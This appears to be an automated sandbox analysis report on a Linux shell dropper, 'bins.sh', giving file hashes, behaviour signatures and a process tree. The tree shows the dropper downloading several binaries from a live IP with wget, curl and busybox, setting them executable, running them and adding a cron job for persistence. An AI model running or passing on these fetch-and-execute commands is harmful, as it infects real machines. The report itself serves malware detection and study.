Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240729-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    04-11-2024 17:42

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    a0dad1a573f72a6534abb219fcb609c3

  • SHA1

    140b3643fa1f39b4149ba4ecf7b68c13e59fad26

  • SHA256

    79055bdb682b5b7fc371766063624ec6392ac3d09f2e698e07af4cf6cc6efa3a

  • SHA512

    736c9b38ddeedc4ad6791d7a4cbcb0c965a04cfefdd19cf1c6efe08fa3a8cd880a18b7b0300a919879507ccac630c74b5f2c2ecb3446b776592495dd0a703401

  • SSDEEP

    192:1amOZ5azCQNhdT4EnSEnSEnkEnsQEnrEnNtV92ypQbaEnSEnSEnkEnsQEnrEnFtg:1amOZ5azCQRx331CWZQbP331CW9hamOd

Malware Config

Signatures

  • Contacts a large (2102) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 5 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 5 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 15 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:1552
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:1553
        • /usr/bin/wget
          wget http://216.126.231.240/bins/rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6Yt
          2⤵
          • Writes file to tmp directory
          PID:1554
        • /usr/bin/curl
          curl -O http://216.126.231.240/bins/rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6Yt
          2⤵
          • Writes file to tmp directory
          PID:1558
        • /bin/busybox
          /bin/busybox wget http://216.126.231.240/bins/rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6Yt
          2⤵
          • Writes file to tmp directory
          PID:1559
        • /bin/chmod
          chmod 777 rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6Yt
          2⤵
          • File and Directory Permissions Modification
          PID:1560
        • /tmp/rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6Yt
          ./rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6Yt
          2⤵
          • Executes dropped EXE
          PID:1561
        • /bin/rm
          rm rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6Yt
          2⤵
            PID:1563
          • /usr/bin/wget
            wget http://216.126.231.240/bins/czVWka3o8UvvUPrq8vvbSKgmuslpFilShk
            2⤵
            • Writes file to tmp directory
            PID:1564
          • /usr/bin/curl
            curl -O http://216.126.231.240/bins/czVWka3o8UvvUPrq8vvbSKgmuslpFilShk
            2⤵
            • Writes file to tmp directory
            PID:1565
          • /bin/busybox
            /bin/busybox wget http://216.126.231.240/bins/czVWka3o8UvvUPrq8vvbSKgmuslpFilShk
            2⤵
            • Writes file to tmp directory
            PID:1566
          • /bin/chmod
            chmod 777 czVWka3o8UvvUPrq8vvbSKgmuslpFilShk
            2⤵
            • File and Directory Permissions Modification
            PID:1567
          • /tmp/czVWka3o8UvvUPrq8vvbSKgmuslpFilShk
            ./czVWka3o8UvvUPrq8vvbSKgmuslpFilShk
            2⤵
            • Executes dropped EXE
            PID:1568
          • /bin/rm
            rm czVWka3o8UvvUPrq8vvbSKgmuslpFilShk
            2⤵
              PID:1570
            • /usr/bin/wget
              wget http://216.126.231.240/bins/qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran
              2⤵
              • Writes file to tmp directory
              PID:1571
            • /usr/bin/curl
              curl -O http://216.126.231.240/bins/qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran
              2⤵
              • Writes file to tmp directory
              PID:1572
            • /bin/busybox
              /bin/busybox wget http://216.126.231.240/bins/qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran
              2⤵
              • Writes file to tmp directory
              PID:1573
            • /bin/chmod
              chmod 777 qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran
              2⤵
              • File and Directory Permissions Modification
              PID:1574
            • /tmp/qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran
              ./qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran
              2⤵
              • Executes dropped EXE
              PID:1575
            • /bin/rm
              rm qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran
              2⤵
                PID:1577
              • /usr/bin/wget
                wget http://216.126.231.240/bins/bWM6meLoue2laMlH2B1O1qbD4Ssl61QdEw
                2⤵
                • Writes file to tmp directory
                PID:1578
              • /usr/bin/curl
                curl -O http://216.126.231.240/bins/bWM6meLoue2laMlH2B1O1qbD4Ssl61QdEw
                2⤵
                • Writes file to tmp directory
                PID:1579
              • /bin/busybox
                /bin/busybox wget http://216.126.231.240/bins/bWM6meLoue2laMlH2B1O1qbD4Ssl61QdEw
                2⤵
                • Writes file to tmp directory
                PID:1580
              • /bin/chmod
                chmod 777 bWM6meLoue2laMlH2B1O1qbD4Ssl61QdEw
                2⤵
                • File and Directory Permissions Modification
                PID:1581
              • /tmp/bWM6meLoue2laMlH2B1O1qbD4Ssl61QdEw
                ./bWM6meLoue2laMlH2B1O1qbD4Ssl61QdEw
                2⤵
                • Executes dropped EXE
                PID:1582
              • /bin/rm
                rm bWM6meLoue2laMlH2B1O1qbD4Ssl61QdEw
                2⤵
                  PID:1584
                • /usr/bin/wget
                  wget http://216.126.231.240/bins/lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB
                  2⤵
                  • Writes file to tmp directory
                  PID:1585
                • /usr/bin/curl
                  curl -O http://216.126.231.240/bins/lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB
                  2⤵
                  • Writes file to tmp directory
                  PID:1586
                • /bin/busybox
                  /bin/busybox wget http://216.126.231.240/bins/lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB
                  2⤵
                  • Writes file to tmp directory
                  PID:1587
                • /bin/chmod
                  chmod 777 lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB
                  2⤵
                  • File and Directory Permissions Modification
                  PID:1588
                • /tmp/lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB
                  ./lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB
                  2⤵
                  • Executes dropped EXE
                  • Renames itself
                  • Reads runtime system information
                  PID:1589
                  • /bin/sh
                    sh -c "crontab -l"
                    3⤵
                      PID:1591
                      • /usr/bin/crontab
                        crontab -l
                        4⤵
                          PID:1592
                      • /bin/sh
                        sh -c "crontab -"
                        3⤵
                          PID:1593
                          • /usr/bin/crontab
                            crontab -
                            4⤵
                            • Creates/modifies Cron job
                            PID:1594
                      • /bin/rm
                        rm lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB
                        2⤵
                          PID:1596
                        • /usr/bin/wget
                          wget http://216.126.231.240/bins/ZSJgcV0iwJrTDvpVbq9NOM46Nvt9yLVqvI
                          2⤵
                            PID:1599

                        Network

                        MITRE ATT&CK Enterprise v15

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • /tmp/bWM6meLoue2laMlH2B1O1qbD4Ssl61QdEw

                          Filesize

                          151KB

                          MD5

                          3c90d5820bddcf7c5d1bd21dfa49d958

                          SHA1

                          5ba05bd489e50af97d6dc45e3a0be60e494d5083

                          SHA256

                          bdebb67266d5f96b7d85cfb9644deee81161b54b60b0fded6cf36544a15fa9b2

                          SHA512

                          54a0e2ec10040634100fb5c4bddc35f558471f4ff833f9ad20f16ffd14c286cf251841bdaad7c557c3c78efc2094db91038c195c0ddabdecf9beac97ff2ce01a

                        • /tmp/czVWka3o8UvvUPrq8vvbSKgmuslpFilShk

                          Filesize

                          107KB

                          MD5

                          eb9c3a0de91fcf16ba17cb24608df68c

                          SHA1

                          09d95a7d70d5e115d103be51edff7c498d272fac

                          SHA256

                          dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47

                          SHA512

                          9e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27

                        • /tmp/lMb93O3SjYM1n6xXH7XsMUrXJ08gE2jTZB

                          Filesize

                          99KB

                          MD5

                          9438d9bc392bcf300a5583b6df5bc8f6

                          SHA1

                          375a6ae34b516f6f3eeea8030c4084f585017efa

                          SHA256

                          68e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e

                          SHA512

                          1f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860

                        • /tmp/qdhfjalFn2FPsMu0xgrj6yZiDLil7A9Ran

                          Filesize

                          119KB

                          MD5

                          1b166b95f9cb4b079ef1b9ec8363ddf3

                          SHA1

                          0d8eb08add467b3b5474f9b25909297fe7c2839c

                          SHA256

                          94a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9

                          SHA512

                          983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925

                        • /tmp/rmTLXJqDxL8M2a3209Imvy4TOoNSn6f6Yt

                          Filesize

                          122KB

                          MD5

                          cd3d4b9c643e5b473fb4d88ed05f0716

                          SHA1

                          64ee7a97418583d759eaea8000890cc3bae1b5f4

                          SHA256

                          0cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944

                          SHA512

                          164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52

                        • /var/spool/cron/crontabs/tmp.2p6Zvk

                          Filesize

                          210B

                          MD5

                          9b6f0e393ef873fc675437738feed5b1

                          SHA1

                          506a676c1ee19e11a7a2b84027815b559d58012c

                          SHA256

                          cdb301225add3c58e6e353d1a44a85cdbbbb2029fe84aa0fe319a605dae98057

                          SHA512

                          7da81de54a75dc363b428e165c2f320cbae7a8dd58ee5ed205c84f5722a51066bd3f8698d3c1142ca85ccca6171d482f11c758b96b4ead60fae144d6eb86607f